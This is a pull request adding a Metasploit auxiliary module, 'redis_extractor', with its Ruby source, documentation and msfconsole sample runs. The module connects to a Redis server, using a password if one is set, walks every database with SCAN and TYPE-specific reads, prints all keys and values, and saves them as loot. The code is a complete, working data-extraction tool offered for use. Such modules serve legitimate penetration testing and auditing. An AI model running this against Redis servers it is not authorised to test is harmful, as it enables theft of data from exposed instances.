### PR TITLE
Add module Redis extractor

### DIFF
--- a/documentation/modules/auxiliary/gather/redis_extractor.md
+++ b/documentation/modules/auxiliary/gather/redis_extractor.md
@@ -1,0 +1,80 @@
+## Vulnerable Application
+
+This module attaches to a Redis instance and extracts all stored keys and their associated data. If multiple databases are present the module will iterate through each.
+
+This module works on Redis versions 2.8.0 and later, and has been tested on versions through 6.0.8.
+
+To prepare a test instance of Redis,first install Redis v2.8.0 or greater. This can be done in docker with:
+
+`docker run -d -p 6379:6379 --name redis redis`
+
+Next, add some data to the database:
+
+`echo 'set key1 value1' | nc 127.0.0.1 6379 > /dev/null`(MacOS, may differ on Linux)
+
+Alternately, to run docker with a password:
+
+```bash
+docker run -d -p 6379:6379 --name redis redis --requirepass abcde
+echo 'auth abcde \n set key2 value2' | nc 127.0.0.1 6379 > /dev/null
+``` 
+
+
+## Verification Steps
+
+1. Install Redis and add data as described above.
+2. Start `msfconsole`
+3. Do: `use auxiliary/gather/redis_extractor`
+4. Do: `set rhosts [ip.of.redis.app]` 
+5. Do: `set PASSWORD [redis_password]` (optional)
+5. Do: `check` (optional)
+6. You will receive information about the Redis instalce.
+7. Do: `run`
+8. You will receive a screendump of the cached keys and contet.
+9. A CSV file with keys and content will be saved in your loot directory.
+
+## Options
+
+### **PASSWORD**
+
+The password for the redis instance. This value will be ignored for instances with no password required.
+
+## Scenarios
+
+### Check 
+
+```bash
+msf6 > use auxiliary/gather/redis_extractor
+msf6 auxiliary(gather/redis_extractor) > set rhosts 172.22.12.168
+rhosts => 172.22.12.168
+msf6 auxiliary(gather/redis_extractor) > check
+
+[+] 172.22.12.168:6379    - Connected to Redis version 6.0.8
+ *] 172.22.12.168:6379    - OS is Linux 5.4.39-linuxkit x86_64
+[*] 172.22.12.168:6379 - The target appears to be vulnerable.
+msf6 auxiliary(gather/redis_extractor) >
+```
+
+### Run
+
+```bash
+msf6 > use auxiliary/gather/redis_extractor
+msf6 auxiliary(gather/redis_extractor) > set rhosts 172.22.12.168
+rhosts => 172.22.12.168
+msf6 auxiliary(gather/redis_extractor) > run
+
+[+] 172.22.12.168:6379    - Connected to Redis version 6.0.8
+[*] 172.22.12.168:6379    - Extracting about 1 keys from databaase 0
+
+Data from 172.22.12.168:6379    database 0
+==========================================
+
+ Key   Value
+ ---   -----
+ key1  value1
+
+[+] 172.22.12.168:6379    - Redis data stored at /root/.msf4/loot/20201113203708_default_172.22.12.168_redis.dump_db0_836292.txt
+[*] 172.22.12.168:6379    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/redis_extractor) >
+```

--- a/modules/auxiliary/gather/redis_extractor.rb
+++ b/modules/auxiliary/gather/redis_extractor.rb
@@ -1,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Redis
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Redis Extractor',
+      'Description'    => %q{
+        This module connects to a Redis instance and retrieves keys and data stored.
+      },
+      'Author'     => ['Geoff Rainville noncenz[at]ultibits.com'],
+      'License'    => MSF_LICENSE,
+      'References' => [['URL', 'https://redis.io/topics/protocol']]
+
+    ))
+  end
+
+  MIN_REDIS_VERSION = '2.8.0'
+  @kv
+
+  # Recurse to assemble the full list of keys
+  def scan(offset)
+    response = redis_command('scan',offset).split("\n")
+    new_offset = response[2].strip # cursor position for next iteration or zero if we are done
+    key_offset=5 # location of first key in each response set.
+    while key_offset < response.length()
+      key = response[key_offset].strip
+      @kv.push([key,value_for_key(key)])
+      key_offset += 2 # skip over byte count and only read data fields.
+    end
+    scan(new_offset) unless new_offset.eql? "0"
+  end
+
+  def value_for_key(key)
+    keyType = redis_command('TYPE',key)
+    case keyType
+    when '+string'
+      return redis_command('get',key).split("\n")[1..-1].join("\n")
+    when '+list'
+      listContent = redis_command('LRANGE',key,'0','-1')
+      return decode_redis_array(listContent)
+    when '+set'
+      setContent = redis_command('SMEMBERS',key)
+      return decode_redis_array(setContent)
+    when '+zset'
+      setContent = redis_command('ZRANGE',key,'0','-1')
+      return decode_redis_array(setContent)
+    when '+hash'
+      hashContent = decode_redis_array(redis_command('HGETALL',key))
+      result = []
+      (0..hashContent.length-1).step(2) do |x|
+        result.append([hashContent[x],hashContent[x+1]])
+      end
+      return result
+    else
+      return 'unknown key type ' + keyType
+    end
+  end
+
+  def decode_redis_array(data)
+    decoded = []
+    x= /\*(?<elements>\S+)\r\n/ =~ data
+    data.slice! "*#{elements}\r\n"
+    while data
+      x = /\$(?<length>\S+)\r/ =~ data
+      data.slice! "$#{length}\r\n"
+      decoded.append(data[0..length.to_i-1])
+      data = data[(length.to_i+2)..-1]
+    end
+    print_error("Error decoding Redis array. Some data may be missing or invalid.") if elements.to_i != decoded.length
+    return decoded
+
+  end
+
+  # Connect to Redis and ensure compatibility.
+  def redis_connect
+    begin
+      connect
+      # Note: Full INFO payload fails occasionally. Using server filter until Redis library can be fixed
+      if (info_data = redis_command('INFO','server')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+        print_good("Connected to Redis version #{redis_version}")
+      end
+
+      # Some connection attempts such as incorrect password set fail silently in the Redis library.
+      if !info_data
+        print_error("Unable to connect to Redis")
+        print_error("Set verbose true to troubleshoot") if !datastore["VERBOSE"]
+        return
+      end
+
+      # Ensure version compatability
+      if (Gem::Version.new(redis_version) < Gem::Version.new(MIN_REDIS_VERSION))
+        print_status("Module supports Redis #{MIN_REDIS_VERSION} or higher.")
+        return
+      end
+
+      # Connection was sucessful
+      return info_data
+
+    rescue Msf::Auxiliary::Failed => e
+      # This error trips when auth is required but password not set
+      print_error("Unable to connect to Redis: " + e.message)
+      return
+
+    rescue Rex::ConnectionTimeout
+      print_error("Timed out trying to connect to Redis")
+      return
+
+    rescue
+      print_error("Unknown error trying to connect to Redis")
+      return
+    end
+  end
+
+  def check_host(ip)
+    info_data=redis_connect
+    if(info_data)
+      if /os:(?<os_ver>.*)/ =~ info_data
+        print_status("OS is #{os_ver} ")
+      end
+
+      if /keys=(?<keys>\S+),expires=/ =~ info_data
+        print_status("Redis reports #{keys} keys stored")
+      end
+
+      if /used_memory_peak_human:(?<bytes>.*)/ =~ info_data
+        print_status("#{bytes.chomp} bytes stored")
+      end
+    end
+    disconnect
+    return info_data ? Msf::Exploit::CheckCode::Appears : Msf::Exploit::CheckCode::Unknown
+  end
+
+  def get_keyspace
+    ks = redis_command('INFO','keyspace')
+    ks = ks.split("\n")[2..-1]
+    result = []
+    ks.each do |k|
+      if /db(?<db>\S+):/ =~ k && /keys=(?<keys>\S+),expires/ =~ k
+        result.append([db,keys])
+      end
+    end
+    return result
+  end
+
+  def run_host(ip)
+    if(!redis_connect)
+      disconnect
+      return
+    end
+
+    keyspace = get_keyspace
+    keyspace.each do |space|
+      print_status("Extracting about #{space[1]} keys from databaase #{space[0]}")
+      redis_command('SELECT',space[0])
+      @kv=[]
+      scan("0")
+
+      if(@kv.length == 0)
+        print_status("No keys returned")
+      else
+
+        # Report data in terminal
+        result_table = Rex::Text::Table.new(
+          'Header'  => "Data from #{peer} database #{space[0]}",
+          'Indent'  => 1,
+          'Columns' => [ 'Key', 'Value' ]
+        )
+        @kv.each { |pair| result_table << pair }
+        print_line
+        print_line("#{result_table}")
+
+        # Store data as loot
+        csv=[]
+        @kv.each { |pair| csv << pair.to_csv }
+        path = store_loot("redis.dump_db#{space[0]}", 'text/plain', rhost,csv.join, 'redis.txt', 'Redis extractor')
+        print_good("Redis data stored at #{path}")
+      end
+    end
+    disconnect
+  end
+end


### PR DESCRIPTION
## **About**

This change adds a new module to /modules/auxiliary/gather that attaches to a Redis instance and extracts all stored keys and their associated data. If multiple databases are present the module will iterate through each.

## **Vulnerable system**

Redis 2.8.0 or newer

## **Verification Steps**

- [ ]  Install or identify a Redis server to target
- [ ]  Start msfconsole
- [ ]  Do: `use auxiliary/gather/redis_extractor`
- [ ]  Do: `set RHOSTS [IP]`
- [ ]  Do: `set RPORT [port]`
- [ ]  Do: `set PASSWORD [password for the Redis instance]`(Optional)
- [ ]  Do: `run`

## **Options**

### **PASSWORD**

The password for the redis instance. Will be ignored for instances with no password required.

## **Scenarios**

### Check

```
msf6 > use auxiliary/gather/redis_extractor
msf6 auxiliary(gather/redis_extractor) > set rhosts 172.22.12.168
rhosts => 172.22.12.168
msf6 auxiliary(gather/redis_extractor) > check

[+] 172.22.12.168:6379    - Connected to Redis version 6.0.8
 *] 172.22.12.168:6379    - OS is Linux 5.4.39-linuxkit x86_64
[*] 172.22.12.168:6379 - The target appears to be vulnerable.
msf6 auxiliary(gather/redis_extractor) >

```

### Run

```bash
msf6 > use auxiliary/gather/redis_extractor
msf6 auxiliary(gather/redis_extractor) > set rhosts 172.22.12.168
rhosts => 172.22.12.168
msf6 auxiliary(gather/redis_extractor) > run

[+] 172.22.12.168:6379    - Connected to Redis version 6.0.8
[*] 172.22.12.168:6379    - Extracting about 1 keys from databaase 0

Data from 172.22.12.168:6379    database 0
==========================================

 Key   Value
 ---   -----
 key1  value1

[+] 172.22.12.168:6379    - Redis data stored at /root/.msf4/loot/20201113203708_default_172.22.12.168_redis.dump_db0_836292.txt
[*] 172.22.12.168:6379    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/redis_extractor) >
```

**Also see attached test script and result**
[test_result_redis_extractor.txt](https://github.com/rapid7/metasploit-framework/files/5907903/test_result_redis_extractor.txt)
[test_redis_extractor.sh.txt](https://github.com/rapid7/metasploit-framework/files/5907905/test_redis_extractor.sh.txt)

